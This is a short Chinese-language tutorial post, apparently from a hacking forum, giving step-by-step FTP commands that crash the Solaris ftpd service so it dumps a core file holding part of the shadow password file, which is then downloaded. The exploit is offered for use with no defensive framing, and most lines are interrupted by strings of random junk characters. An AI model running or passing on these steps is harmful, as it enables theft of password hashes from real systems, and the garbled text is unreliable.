该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
& M7 E8 C) m, m# X* }( V# I% P$ C: I4 V, h- @3 |
1.通过 ftp 正常登录到目的主机上
( X' i6 Y/ _* C# \/ C0 U
# L8 s* y1 L9 r' l3 f2.输入如下命令序列:& {3 ?' M h7 c, E* t0 P9 Z8 J8 {
% I! h9 l8 y1 g! Q/ o- l: B7 r. A) z
ftp> user root wrongpasswd$ ?3 l% i f( g% @3 \- O* S
) ?, @# X" L( |3 u" X, _" h
ftp> quote pasv
4 q z& A @: [6 y
9 ?; \2 G1 q$ _: g& D3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
7 W) W/ i& R' G" v' Y
# E' W; J) |7 k2 B3 s3 v* x# q4.再次进入FTP >get core7 T# H% u# n9 m U6 g" \+ q
$ K6 |0 t; F0 S `' S' H补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
# {1 o4 L. y, T- {) j. M* q' g
( M# `5 |* W( R" \5 ~7 h# f |